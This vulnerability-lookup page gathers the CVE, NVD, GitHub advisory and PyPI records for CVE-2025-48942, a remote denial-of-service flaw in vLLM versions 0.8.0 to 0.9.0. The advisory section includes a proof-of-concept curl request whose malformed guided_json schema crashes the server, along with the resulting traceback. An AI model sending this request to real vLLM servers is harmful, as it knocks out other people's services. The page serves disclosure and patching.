cvelistv5 - cve-2025-48942

CVE-2025-48942 (GCVE-0-2025-48942)

Vulnerability from cvelistv5 – Published: 2025-05-30 18:33 – Updated: 2025-05-30 20:37

Title

vLLM DOS: Remotely kill vllm over http with invalid JSON schema

Summary

vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.

Severity ?

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-248 - Uncaught Exception

Assigner

GitHub_M

References

URL

Tags

	https://github.com/vllm-project/vllm/security/adv…	x_refsource_CONFIRM
	https://github.com/vllm-project/vllm/issues/17248	x_refsource_MISC
	https://github.com/vllm-project/vllm/pull/17623	x_refsource_MISC
	https://github.com/vllm-project/vllm/commit/08bf7…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	vllm-project	vllm	Affected: >= 0.8.0, < 0.9.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-48942",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-05-30T20:36:50.679547Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-05-30T20:37:06.015Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "vllm",
          "vendor": "vllm-project",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.8.0, \u003c 0.9.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the  /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-248",
              "description": "CWE-248: Uncaught Exception",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-30T18:37:10.641Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/vllm-project/vllm/security/advisories/GHSA-6qc9-v4r8-22xg",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-6qc9-v4r8-22xg"
        },
        {
          "name": "https://github.com/vllm-project/vllm/issues/17248",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/vllm-project/vllm/issues/17248"
        },
        {
          "name": "https://github.com/vllm-project/vllm/pull/17623",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/vllm-project/vllm/pull/17623"
        },
        {
          "name": "https://github.com/vllm-project/vllm/commit/08bf7840780980c7568c573c70a6a8db94fd45ff",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/vllm-project/vllm/commit/08bf7840780980c7568c573c70a6a8db94fd45ff"
        }
      ],
      "source": {
        "advisory": "GHSA-6qc9-v4r8-22xg",
        "discovery": "UNKNOWN"
      },
      "title": "vLLM DOS: Remotely kill vllm over http with invalid JSON schema"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-48942",
    "datePublished": "2025-05-30T18:33:40.488Z",
    "dateReserved": "2025-05-28T18:49:07.581Z",
    "dateUpdated": "2025-05-30T20:37:06.015Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-48942\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-05-30T19:15:30.130\",\"lastModified\":\"2025-06-24T17:44:47.737\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the  /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.\"},{\"lang\":\"es\",\"value\":\"vLLM es un motor de inferencia y servicio para modelos de lenguaje grandes (LLM). En las versiones 0.8.0 y 0.9.0, excepto esta, al acceder a la API /v1/completions con un json_schema no v\u00e1lido como par\u00e1metro guiado, se desactiva el servidor vllm. Esta vulnerabilidad es similar a la vulnerabilidad GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, pero para expresiones regulares en lugar de un esquema JSON. La versi\u00f3n 0.9.0 corrige el problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-248\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"0.8.0\",\"versionEndExcluding\":\"0.9.0\",\"matchCriteriaId\":\"8E26EB9F-426B-4A73-B8CA-2D9F3727AF2C\"}]}]}],\"references\":[{\"url\":\"https://github.com/vllm-project/vllm/commit/08bf7840780980c7568c573c70a6a8db94fd45ff\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/vllm-project/vllm/issues/17248\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/vllm-project/vllm/pull/17623\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/vllm-project/vllm/security/advisories/GHSA-6qc9-v4r8-22xg\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-48942\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-05-30T20:36:50.679547Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-05-30T20:37:00.956Z\"}}], \"cna\": {\"title\": \"vLLM DOS: Remotely kill vllm over http with invalid JSON schema\", \"source\": {\"advisory\": \"GHSA-6qc9-v4r8-22xg\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"vllm-project\", \"product\": \"vllm\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 0.8.0, \u003c 0.9.0\"}]}], \"references\": [{\"url\": \"https://github.com/vllm-project/vllm/security/advisories/GHSA-6qc9-v4r8-22xg\", \"name\": \"https://github.com/vllm-project/vllm/security/advisories/GHSA-6qc9-v4r8-22xg\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/vllm-project/vllm/issues/17248\", \"name\": \"https://github.com/vllm-project/vllm/issues/17248\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/vllm-project/vllm/pull/17623\", \"name\": \"https://github.com/vllm-project/vllm/pull/17623\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/vllm-project/vllm/commit/08bf7840780980c7568c573c70a6a8db94fd45ff\", \"name\": \"https://github.com/vllm-project/vllm/commit/08bf7840780980c7568c573c70a6a8db94fd45ff\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the  /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-248\", \"description\": \"CWE-248: Uncaught Exception\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-05-30T18:37:10.641Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-48942\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-05-30T20:37:06.015Z\", \"dateReserved\": \"2025-05-28T18:49:07.581Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-05-30T18:33:40.488Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

FKIE_CVE-2025-48942

Vulnerability from fkie_nvd - Published: 2025-05-30 19:15 - Updated: 2025-06-24 17:44

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/vllm-project/vllm/commit/08bf7840780980c7568c573c70a6a8db94fd45ff	Patch
security-advisories@github.com	https://github.com/vllm-project/vllm/issues/17248	Issue Tracking
security-advisories@github.com	https://github.com/vllm-project/vllm/pull/17623	Issue Tracking, Patch
security-advisories@github.com	https://github.com/vllm-project/vllm/security/advisories/GHSA-6qc9-v4r8-22xg	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	vllm	vllm	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8E26EB9F-426B-4A73-B8CA-2D9F3727AF2C",
              "versionEndExcluding": "0.9.0",
              "versionStartIncluding": "0.8.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the  /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue."
    },
    {
      "lang": "es",
      "value": "vLLM es un motor de inferencia y servicio para modelos de lenguaje grandes (LLM). En las versiones 0.8.0 y 0.9.0, excepto esta, al acceder a la API /v1/completions con un json_schema no v\u00e1lido como par\u00e1metro guiado, se desactiva el servidor vllm. Esta vulnerabilidad es similar a la vulnerabilidad GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, pero para expresiones regulares en lugar de un esquema JSON. La versi\u00f3n 0.9.0 corrige el problema."
    }
  ],
  "id": "CVE-2025-48942",
  "lastModified": "2025-06-24T17:44:47.737",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-05-30T19:15:30.130",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/vllm-project/vllm/commit/08bf7840780980c7568c573c70a6a8db94fd45ff"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/vllm-project/vllm/issues/17248"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking",
        "Patch"
      ],
      "url": "https://github.com/vllm-project/vllm/pull/17623"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-6qc9-v4r8-22xg"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-248"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-6QC9-V4R8-22XG

Vulnerability from github – Published: 2025-05-28 19:41 – Updated: 2025-06-27 21:06

Summary

vLLM DOS: Remotely kill vllm over http with invalid JSON schema

Details

Summary

Hitting the /v1/completions API with a invalid json_schema as a Guided Param will kill the vllm server

Details

The following API call (venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}' will provoke a Uncaught exceptions from xgrammer in ./lib64/python3.11/site-packages/xgrammar/compiler.py

Issue with more information: https://github.com/vllm-project/vllm/issues/17248

PoC

Make a call to vllm with invalid json_scema e.g. {\"properties\":{\"reason\":{\"type\": \"stsring\"}}}

curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'

Impact

vllm crashes

example traceback

ERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last):
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 333, in run_engine_core
ERROR 03-26 17:25:01 [core.py:340]     engine_core.run_busy_loop()
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 367, in run_busy_loop
ERROR 03-26 17:25:01 [core.py:340]     outputs = step_fn()
ERROR 03-26 17:25:01 [core.py:340]               ^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 181, in step
ERROR 03-26 17:25:01 [core.py:340]     scheduler_output = self.scheduler.schedule()
ERROR 03-26 17:25:01 [core.py:340]                        ^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py", line 257, in schedule
ERROR 03-26 17:25:01 [core.py:340]     if structured_output_req and structured_output_req.grammar:
ERROR 03-26 17:25:01 [core.py:340]                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 41, in grammar
ERROR 03-26 17:25:01 [core.py:340]     completed = self._check_grammar_completion()
ERROR 03-26 17:25:01 [core.py:340]                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 29, in _check_grammar_completion
ERROR 03-26 17:25:01 [core.py:340]     self._grammar = self._grammar.result(timeout=0.0001)
ERROR 03-26 17:25:01 [core.py:340]                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 456, in result
ERROR 03-26 17:25:01 [core.py:340]     return self.__get_result()
ERROR 03-26 17:25:01 [core.py:340]            ^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 401, in __get_result
ERROR 03-26 17:25:01 [core.py:340]     raise self._exception
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/thread.py", line 58, in run
ERROR 03-26 17:25:01 [core.py:340]     result = self.fn(*self.args, **self.kwargs)
ERROR 03-26 17:25:01 [core.py:340]              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py", line 120, in _async_create_grammar
ERROR 03-26 17:25:01 [core.py:340]     ctx = self.compiler.compile_json_schema(grammar_spec,
ERROR 03-26 17:25:01 [core.py:340]           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py", line 101, in compile_json_schema
ERROR 03-26 17:25:01 [core.py:340]     self._handle.compile_json_schema(
ERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is<picojson::object>()) is false: Schema should be an object or bool
ERROR 03-26 17:25:01 [core.py:340] 
ERROR 03-26 17:25:01 [core.py:340] 
CRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue.

Fix

https://github.com/vllm-project/vllm/pull/17623

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "vllm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.8.0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-48942"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-248"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-28T19:41:53Z",
    "nvd_published_at": "2025-05-30T19:15:30Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nHitting the  /v1/completions API with a invalid json_schema as a Guided Param will kill the vllm server\n\n\n### Details\nThe following API call \n`(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H \"Content-Type: application/json\" -d \u0027{\"model\": \"meta-llama/Llama-3.2-3B-Instruct\",\"prompt\": \"Name two great reasons to visit Sligo \", \"max_tokens\": 10, \"temperature\": 0.5, \"guided_json\":\"{\\\"properties\\\":{\\\"reason\\\":{\\\"type\\\": \\\"stsring\\\"}}}\"}\u0027   \n`\nwill provoke a Uncaught exceptions from xgrammer in \n`./lib64/python3.11/site-packages/xgrammar/compiler.py\n`\n\nIssue with more information: https://github.com/vllm-project/vllm/issues/17248\n\n### PoC\nMake a call to vllm with invalid json_scema e.g. `{\\\"properties\\\":{\\\"reason\\\":{\\\"type\\\": \\\"stsring\\\"}}}`\n\n`curl -s http://localhost:8000/v1/completions -H \"Content-Type: application/json\" -d \u0027{\"model\": \"meta-llama/Llama-3.2-3B-Instruct\",\"prompt\": \"Name two great reasons to visit Sligo \", \"max_tokens\": 10, \"temperature\": 0.5, \"guided_json\":\"{\\\"properties\\\":{\\\"reason\\\":{\\\"type\\\": \\\"stsring\\\"}}}\"}\u0027\n`\n### Impact\nvllm crashes\n\n\nexample traceback\n```\nERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last):\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/vllm/v1/engine/core.py\", line 333, in run_engine_core\nERROR 03-26 17:25:01 [core.py:340]     engine_core.run_busy_loop()\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/vllm/v1/engine/core.py\", line 367, in run_busy_loop\nERROR 03-26 17:25:01 [core.py:340]     outputs = step_fn()\nERROR 03-26 17:25:01 [core.py:340]               ^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/vllm/v1/engine/core.py\", line 181, in step\nERROR 03-26 17:25:01 [core.py:340]     scheduler_output = self.scheduler.schedule()\nERROR 03-26 17:25:01 [core.py:340]                        ^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py\", line 257, in schedule\nERROR 03-26 17:25:01 [core.py:340]     if structured_output_req and structured_output_req.grammar:\nERROR 03-26 17:25:01 [core.py:340]                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py\", line 41, in grammar\nERROR 03-26 17:25:01 [core.py:340]     completed = self._check_grammar_completion()\nERROR 03-26 17:25:01 [core.py:340]                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py\", line 29, in _check_grammar_completion\nERROR 03-26 17:25:01 [core.py:340]     self._grammar = self._grammar.result(timeout=0.0001)\nERROR 03-26 17:25:01 [core.py:340]                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/usr/lib64/python3.11/concurrent/futures/_base.py\", line 456, in result\nERROR 03-26 17:25:01 [core.py:340]     return self.__get_result()\nERROR 03-26 17:25:01 [core.py:340]            ^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/usr/lib64/python3.11/concurrent/futures/_base.py\", line 401, in __get_result\nERROR 03-26 17:25:01 [core.py:340]     raise self._exception\nERROR 03-26 17:25:01 [core.py:340]   File \"/usr/lib64/python3.11/concurrent/futures/thread.py\", line 58, in run\nERROR 03-26 17:25:01 [core.py:340]     result = self.fn(*self.args, **self.kwargs)\nERROR 03-26 17:25:01 [core.py:340]              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py\", line 120, in _async_create_grammar\nERROR 03-26 17:25:01 [core.py:340]     ctx = self.compiler.compile_json_schema(grammar_spec,\nERROR 03-26 17:25:01 [core.py:340]           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py\", line 101, in compile_json_schema\nERROR 03-26 17:25:01 [core.py:340]     self._handle.compile_json_schema(\nERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is\u003cpicojson::object\u003e()) is false: Schema should be an object or bool\nERROR 03-26 17:25:01 [core.py:340] \nERROR 03-26 17:25:01 [core.py:340] \nCRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue.\n```\n\n### Fix\n\n* https://github.com/vllm-project/vllm/pull/17623",
  "id": "GHSA-6qc9-v4r8-22xg",
  "modified": "2025-06-27T21:06:56Z",
  "published": "2025-05-28T19:41:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-6qc9-v4r8-22xg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48942"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/issues/17248"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/pull/17623"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/commit/08bf7840780980c7568c573c70a6a8db94fd45ff"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2025-54.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vllm-project/vllm"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vLLM DOS: Remotely kill vllm over http with invalid JSON schema"
}

PYSEC-2025-54

Vulnerability from pysec - Published: 2025-05-30 19:15 - Updated: 2025-06-26 21:23

Details

Impacted products

Name	purl
vllm	pkg:pypi/vllm

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "vllm",
        "purl": "pkg:pypi/vllm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "08bf7840780980c7568c573c70a6a8db94fd45ff"
            }
          ],
          "repo": "https://github.com/vllm-project/vllm",
          "type": "GIT"
        },
        {
          "events": [
            {
              "introduced": "0.8.0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.8.0",
        "0.8.1",
        "0.8.2",
        "0.8.3",
        "0.8.4",
        "0.8.5",
        "0.8.5.post1"
      ]
    }
  ],
  "aliases": [
    "CVE-2025-48942",
    "GHSA-6qc9-v4r8-22xg"
  ],
  "details": "vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the  /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.",
  "id": "PYSEC-2025-54",
  "modified": "2025-06-26T21:23:06.319321+00:00",
  "published": "2025-05-30T19:15:30+00:00",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-6qc9-v4r8-22xg"
    },
    {
      "type": "EVIDENCE",
      "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-6qc9-v4r8-22xg"
    },
    {
      "type": "FIX",
      "url": "https://github.com/vllm-project/vllm/commit/08bf7840780980c7568c573c70a6a8db94fd45ff"
    },
    {
      "type": "FIX",
      "url": "https://github.com/vllm-project/vllm/pull/17623"
    },
    {
      "type": "REPORT",
      "url": "https://github.com/vllm-project/vllm/issues/17248"
    },
    {
      "type": "REPORT",
      "url": "https://github.com/vllm-project/vllm/pull/17623"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-48942 (GCVE-0-2025-48942)

FKIE_CVE-2025-48942

GHSA-6QC9-V4R8-22XG

Summary

Details

PoC

Impact

